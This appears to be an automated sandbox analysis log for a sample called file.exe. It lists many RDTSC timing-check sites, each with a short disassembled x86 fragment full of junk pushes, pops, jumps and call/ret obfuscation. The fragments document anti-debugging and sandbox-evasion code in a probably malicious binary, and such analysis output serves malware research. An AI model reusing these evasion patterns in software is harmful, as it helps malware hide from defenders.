Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8F0C51 second address: 8F0D27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 add dword ptr [esp], 77580FEFh 0x0000000e mov edx, 56BEB6B7h 0x00000013 push 00000003h 0x00000015 sub dword ptr [ebp+122D1CA2h], edi 0x0000001b jmp 00007F988C7CE327h 0x00000020 push 00000000h 0x00000022 mov dx, si 0x00000025 push 00000003h 0x00000027 mov ecx, dword ptr [ebp+122D379Fh] 0x0000002d push C086D816h 0x00000032 push eax 0x00000033 jmp 00007F988C7CE325h 0x00000038 pop eax 0x00000039 xor dword ptr [esp], 0086D816h 0x00000040 jne 00007F988C7CE321h 0x00000046 lea ebx, dword ptr [ebp+1245598Fh] 0x0000004c mov dh, ch 0x0000004e xchg eax, ebx 0x0000004f pushad 0x00000050 jmp 00007F988C7CE327h 0x00000055 pushad 0x00000056 jmp 00007F988C7CE329h 0x0000005b jl 00007F988C7CE316h 0x00000061 popad 0x00000062 popad 0x00000063 push eax 0x00000064 jnp 00007F988C7CE339h 0x0000006a push eax 0x0000006b push edx 0x0000006c jmp 00007F988C7CE327h 0x00000071 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 902974 second address: 90297E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 90297E second address: 902982 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8DD17F second address: 8DD183 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 910ECC second address: 910EE7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988C7CE31Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007F988C7CE318h 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 910EE7 second address: 910EF2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jp 00007F988D0B0286h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 911057 second address: 911061 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F988C7CE316h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 911061 second address: 911082 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988D0B0293h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b jo 00007F988D0B0286h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 911082 second address: 9110A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F988C7CE321h 0x00000009 popad 0x0000000a js 00007F988C7CE322h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9110A0 second address: 9110A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9110A6 second address: 9110B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 jbe 00007F988C7CE316h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9110B4 second address: 9110B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 911385 second address: 911389 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 911513 second address: 911543 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F988D0B028Fh 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F988D0B028Fh 0x00000012 jns 00007F988D0B028Ah 0x00000018 push edi 0x00000019 pop edi 0x0000001a push eax 0x0000001b pop eax 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9117DF second address: 9117F5 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F988C7CE316h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c jg 00007F988C7CE31Eh 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 911D7E second address: 911D82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 912314 second address: 91232E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988C7CE321h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 91232E second address: 912336 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 912336 second address: 91233B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9149DC second address: 9149E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9149E1 second address: 9149E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 913919 second address: 91392D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F988D0B0290h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 913F93 second address: 913F97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E2227 second address: 8E222B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E222B second address: 8E222F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E222F second address: 8E2242 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F988D0B028Dh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 91E2FC second address: 91E30C instructions: 0x00000000 rdtsc 0x00000002 jc 00007F988C7CE316h 0x00000008 js 00007F988C7CE316h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 91E30C second address: 91E358 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F988D0B02A3h 0x00000008 jo 00007F988D0B028Ch 0x0000000e jo 00007F988D0B0286h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 je 00007F988D0B02A1h 0x0000001c push esi 0x0000001d push ecx 0x0000001e pop ecx 0x0000001f pop esi 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F988D0B028Dh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 91D944 second address: 91D949 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 921676 second address: 92167A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92167A second address: 921680 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 921B9B second address: 921BA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F988D0B0286h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 921C7C second address: 921C8C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push edi 0x0000000e pop edi 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 922174 second address: 922190 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], ebx 0x00000009 mov di, 7BD4h 0x0000000d nop 0x0000000e push eax 0x0000000f push edx 0x00000010 ja 00007F988D0B028Ch 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9224F8 second address: 9224FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 922737 second address: 922767 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F988D0B0286h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jp 00007F988D0B0297h 0x00000010 popad 0x00000011 mov dword ptr [esp], eax 0x00000014 stc 0x00000015 push eax 0x00000016 push ecx 0x00000017 jl 00007F988D0B028Ch 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 922C46 second address: 922C4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9245BD second address: 9245C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F988D0B0286h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92502E second address: 925036 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 925036 second address: 92508A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ecx 0x0000000e call 00007F988D0B0288h 0x00000013 pop ecx 0x00000014 mov dword ptr [esp+04h], ecx 0x00000018 add dword ptr [esp+04h], 00000018h 0x00000020 inc ecx 0x00000021 push ecx 0x00000022 ret 0x00000023 pop ecx 0x00000024 ret 0x00000025 movzx edi, cx 0x00000028 push 00000000h 0x0000002a mov edi, dword ptr [ebp+122D386Fh] 0x00000030 push 00000000h 0x00000032 mov dword ptr [ebp+122D28D7h], edi 0x00000038 xchg eax, ebx 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c jmp 00007F988D0B0290h 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92508A second address: 92508F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9270E6 second address: 9270EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 927B41 second address: 927B45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 927B45 second address: 927BC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007F988D0B0288h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 0000001Bh 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 push 00000000h 0x00000024 push 00000000h 0x00000026 push ecx 0x00000027 call 00007F988D0B0288h 0x0000002c pop ecx 0x0000002d mov dword ptr [esp+04h], ecx 0x00000031 add dword ptr [esp+04h], 0000001Bh 0x00000039 inc ecx 0x0000003a push ecx 0x0000003b ret 0x0000003c pop ecx 0x0000003d ret 0x0000003e jne 00007F988D0B0286h 0x00000044 push 00000000h 0x00000046 push 00000000h 0x00000048 push edi 0x00000049 call 00007F988D0B0288h 0x0000004e pop edi 0x0000004f mov dword ptr [esp+04h], edi 0x00000053 add dword ptr [esp+04h], 00000017h 0x0000005b inc edi 0x0000005c push edi 0x0000005d ret 0x0000005e pop edi 0x0000005f ret 0x00000060 xchg eax, ebx 0x00000061 pushad 0x00000062 push edi 0x00000063 push eax 0x00000064 push edx 0x00000065 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92B2F6 second address: 92B301 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92D698 second address: 92D69C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92D69C second address: 92D6ED instructions: 0x00000000 rdtsc 0x00000002 js 00007F988C7CE316h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b nop 0x0000000c mov bx, si 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007F988C7CE318h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 00000014h 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b mov ebx, dword ptr [ebp+122D34D5h] 0x00000031 push 00000000h 0x00000033 jmp 00007F988C7CE31Eh 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F988C7CE31Bh 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92E946 second address: 92E94E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 92F879 second address: 92F88E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F988C7CE31Ah 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 931841 second address: 931845 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 931845 second address: 931849 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 931849 second address: 931856 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 933727 second address: 93372B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 934665 second address: 934674 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F988D0B028Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93372B second address: 93373B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988C7CE31Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93373B second address: 933752 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F988D0B0293h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9355EF second address: 935657 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jc 00007F988C7CE316h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007F988C7CE318h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 0000001Ch 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b ja 00007F988C7CE319h 0x00000031 push 00000000h 0x00000033 mov bh, cl 0x00000035 push 00000000h 0x00000037 sub dword ptr [ebp+122D34DEh], esi 0x0000003d xchg eax, esi 0x0000003e jng 00007F988C7CE324h 0x00000044 push eax 0x00000045 push eax 0x00000046 push edx 0x00000047 pushad 0x00000048 push eax 0x00000049 pop eax 0x0000004a pushad 0x0000004b popad 0x0000004c popad 0x0000004d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9375D7 second address: 9375DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9375DD second address: 9375E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9395C0 second address: 9395CD instructions: 0x00000000 rdtsc 0x00000002 jns 00007F988D0B0286h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9395CD second address: 9395EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F988C7CE324h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9395EA second address: 9395EF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9357EA second address: 9357F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 939703 second address: 9397A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F988D0B0291h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jnl 00007F988D0B029Fh 0x00000011 jmp 00007F988D0B0299h 0x00000016 nop 0x00000017 mov ebx, dword ptr [ebp+122D1CD0h] 0x0000001d push dword ptr fs:[00000000h] 0x00000024 or bx, ED64h 0x00000029 mov dword ptr fs:[00000000h], esp 0x00000030 push 00000000h 0x00000032 push ebx 0x00000033 call 00007F988D0B0288h 0x00000038 pop ebx 0x00000039 mov dword ptr [esp+04h], ebx 0x0000003d add dword ptr [esp+04h], 0000001Dh 0x00000045 inc ebx 0x00000046 push ebx 0x00000047 ret 0x00000048 pop ebx 0x00000049 ret 0x0000004a mov di, 5941h 0x0000004e mov eax, dword ptr [ebp+122D1695h] 0x00000054 mov edi, dword ptr [ebp+124559DAh] 0x0000005a push FFFFFFFFh 0x0000005c jmp 00007F988D0B0291h 0x00000061 mov dword ptr [ebp+12484F10h], edi 0x00000067 push eax 0x00000068 pushad 0x00000069 push eax 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9397A6 second address: 9397C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F988C7CE327h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93B541 second address: 93B545 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9397C4 second address: 9397C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93DB0C second address: 93DB19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93DB19 second address: 93DB1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 93DB1D second address: 93DB21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 944A8A second address: 944A90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 944A90 second address: 944AB9 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F988D0B0288h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F988D0B028Bh 0x00000010 jns 00007F988D0B028Ch 0x00000016 pushad 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9443FB second address: 944400 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 944400 second address: 944408 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9446A8 second address: 9446AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 94914E second address: 94915B instructions: 0x00000000 rdtsc 0x00000002 jns 00007F988D0B0286h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 94915B second address: 949169 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 949169 second address: 94916F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8DB7AC second address: 8DB7DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F988C7CE329h 0x00000009 je 00007F988C7CE316h 0x0000000f popad 0x00000010 jmp 00007F988C7CE31Ch 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8DB7DC second address: 8DB80A instructions: 0x00000000 rdtsc 0x00000002 jns 00007F988D0B0288h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jc 00007F988D0B02ADh 0x00000012 jmp 00007F988D0B0299h 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8DB80A second address: 8DB810 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 94DFB4 second address: 94DFC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 94DFC5 second address: 94DFCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 94DFCB second address: 94DFCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 94E683 second address: 94E687 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 94E687 second address: 94E68B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 94E68B second address: 94E696 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 953173 second address: 95318F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F988D0B0286h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push edx 0x0000000c pop edx 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jc 00007F988D0B0286h 0x00000016 jc 00007F988D0B0286h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9532CF second address: 9532D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
